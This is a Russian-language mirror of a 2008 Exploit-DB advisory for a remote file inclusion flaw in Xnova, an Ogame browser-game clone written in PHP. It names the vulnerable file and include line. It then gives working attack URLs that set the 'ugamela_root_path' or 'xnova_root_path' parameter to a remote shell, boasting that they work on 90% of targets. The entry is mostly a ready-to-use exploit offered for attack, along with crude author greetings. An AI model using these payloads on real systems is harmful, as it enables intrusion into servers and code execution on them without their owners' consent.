- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6254
- Проверка EDB
-
- Пройдено
- Автор
- NUCLEARHAXOR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6023 cve-2008-6022
- Дата публикации
- 2008-08-17
Код:
##################################################################################################################################
Name: Xnova(Ogame) Remote File Inclusion
Author : NuclearHaxor
Contact MSN: [email protected]
homepage of xnova: http://xnova.fr/
Vuln file: includes/todofleetcontrol.php
Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)
Exploit(this exploit works in 90% targets):
------
target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
or new version of xnova:
target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
------
FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r
##################################################################################################################################
# milw0rm.com [2008-08-17]
- Источник
- www.exploit-db.com